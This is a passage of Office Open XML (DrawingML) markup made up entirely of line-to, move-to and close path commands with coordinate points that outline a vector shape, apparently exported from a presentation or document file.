                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2052" y="4872"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099" y="4767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268" y="4494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2336" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="4242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845" y="4515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3003" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="4725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3170" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3228" y="4977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="5045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="5108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="5177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="5308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2572" y="5250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567" y="5229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2562" y="5213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2525" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="5156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="5161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="5171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="5182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257" y="5119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131" y="5024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2136" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126" y="4961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4872"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3459" y="3817"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="3869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3779" y="4956"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="4846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3375" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3606" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3628" y="4153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3654" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827" y="4479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3837" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3816" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3801" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2698" y="4174"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2976" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="4709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3034" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="4526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="4310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3223" y="3979"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861" y="4042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2640" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="3964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="3854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="3880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4220" y="4856"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4068" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3942" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="5056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4121" y="4919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="4804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3984" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="4620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="4300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="4221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="4205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052" y="4252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="3885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3464" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3522" y="3460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3543" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="3360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="3439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3481" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3444" y="3523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="3554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213" y="3444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="3344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="3119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2672" y="3097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2703" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="3134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="3124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3192"/>
